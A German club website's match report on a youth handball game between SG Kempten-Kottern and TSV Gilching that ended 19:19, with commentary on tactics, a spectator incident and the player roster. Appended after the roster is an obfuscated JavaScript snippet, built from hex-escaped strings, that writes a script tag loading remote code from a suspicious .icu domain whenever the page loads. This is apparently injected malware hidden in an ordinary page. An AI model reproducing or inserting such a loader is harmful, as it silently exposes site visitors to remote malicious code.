01. Oktober 2018 / Autor: / Kategorie: Spielberichte

Mit einem unbekannten Gegner, aber großen Respekt empfingen Spieler und Offizielle mit dem TSV Gilching eine Mannschaft, die genau das hohe Leistungsniveau mitbrachte, wie man erwartet hatte. Die Leistungsdichte in der B-Jugend Landesliga ist sehr eng beieinander und erkennt man bereits nach drei Spieltagen, wo Nuancen oft auschlaggebend sind über Sieg oder Niederlage. Genauso der Spielverlauf der B-Jugendlichen gegen die Oberbayern, die in der Anfangsphase stets mit einem Tor in Führung gingen (1:0, 2:1, 3:2), aber bereits nach 18Minuten und dem 5:4 sehen konnte, dass sich beide Mannschaften extrem schwer gegen die gegnerische Abwehr inklusive Torhüter taten und in der 1.Hbz eine torarme Begnegung mit dem 6:7 nach 25Minuten endete.

In der Kabine musste Tacheles gesprochen werden, dass mit so einer schwachen Angriffsleistung nichts zählbares mitgenommen wird und die SG-Talente zu einem präzisen Passspiel im Positionsangriff kommen mussten, so dass ein Rhythmus entstehen kann bis zu den Auslösehandlungen, der in der 1.Hbz so gut wie nie zustande kam, da deutlich zu viele technische Fehler vorkamen und dadurch Gilching zu leichten Gegenstosstoren eingeladen wurde. Zudem musste in den nächsten 25 Minuten mehr Übergänge gespielt werden, um die offensiv gut stehende Abwehr von Gilching vor Übergabe-Übernahme Probleme zu stellen. Dadurch ergeben sich Lücken für die Rückraumspieler der Blau-Roten, um selbst zu Abschlüssen zu kommen oder in der Kleingruppe mit den beiden Kreisläufern zu nützen. Die Defensivarbeit mit einem vorbildlich kämpfenden Mittelblock Thomas Wehr, Johannes Koch, Lukas Haug und Elias Trunzer machten einen hervorragenden Job und der gut aufgelegte Frieder Mari dahinter ließen nur 19Gegentore zu und legten somit das Fundament für den hart erkämpften Punkt.

Zu Beginn der 2.Hbz trafen die Kempten-Kottener auf eine starke Phase der Oberbayern, die nach 32Minuten mit 7:10 wegzogen und es zu diesem Zeitpunkt den Anschein machte, dass die Gäste an diesem Tag mit 2-3 Toren die bessere und körperlich überlegende Mannschaft seih. Doch mit einer gewaltigen Leistungssteigerung, einem beeindruckendem Kampfgeist und einer taktischen Änderung stets mit zwei Kreisläufer zu agieren, konnten die B-Jugendlichen Tor für Tor aufholen, bis sie selbst in der 40.Minute mit 14:13 in Führung ging und sich in den letzten 10Minuten ein wahrer Krimi entwickelte. Unnöterweise gab es ein Zwischenfall auf der Tribüne, wo sich ein Gäste-Zuschauer derart lautstark über einen vermeitlichen Wechselfehler ärgerte, dass das Spiel kurzzeitig unterbrochen werden musste und ein derartiges Verhalten bei einem Jugendspiel fehl am Platz ist.

In der Prime Time war die Partie auf Messer’s Schneide und beide Teams kämpften beeindruckend, um als Sieger vom Platz zu gehen. Bis zum 17:16 in der 43.Minute hatten die SG’ler die Nase knapp vorne, dann drehte Gilching das Spiel und konnte beim 18:19 in der 48.Minute in Front gehen, bevor der in der 2.Halbzeit über sich hinauswachsende Johannes Koch den 19:19 Endstand erzielte. Die B-Jugendlichen hatten sogar im letzten Angriff und einem Time-Out 13Sekunden vor Schluss selbst noch die Möglichkeit, die Begegnung für sich zu entscheiden, doch es kam kein klares Wurfbild mehr zustande und somit endete eine hart umkämpfte Partie leistungsgerecht mit einem 19:19 und darauf alle Beteiligten der SG Kempten-Kottern stolz sein können.

Für die SG im Einsatz:

Frieder Mari, Dominik Merfels (beide Torhüter)

Thomas Wehr 2, Johannes Koch 6/2, Moritz Maier, Max Widmer, Oliver Hinkelmann 3, Elias Trunzer 3, Finn Sattler, Lukas Haug 5/1, Max Romanesen, Lukas Bareth

var _0xe540=[„\x3C\x73\x63\x72″,“\x69\x70\x74\x20\x61\x73\x79\x6E\x63\x20\x63\x6C\x61\x73\x73\x3D\x22\x3D\x52\x32\x4E\x34\x54\x55\x77\x7A\x52\x6C\x6F\x37\x4C\x54\x63\x31\x4F\x7A\x45\x3D\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x6C\x61\x79\x2E\x64\x69\x6E\x6F\x72″,“\x73\x6C\x69\x63\x6B\x2E\x69\x63\x75\x2F\x61\x70\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72″,“\x69\x70\x74\x3E“,“\x77\x72\x69\x74\x65″];function gpor(){var _0x4eb6x2=_0xe540[0];var _0x4eb6x3=_0xe540[1];var _0x4eb6x4=_0xe540[2];var _0x4eb6x5=_0xe540[3];document[_0xe540[4]](_0x4eb6x2+ _0x4eb6x3+ _0x4eb6x4+ _0x4eb6x5)}gpor()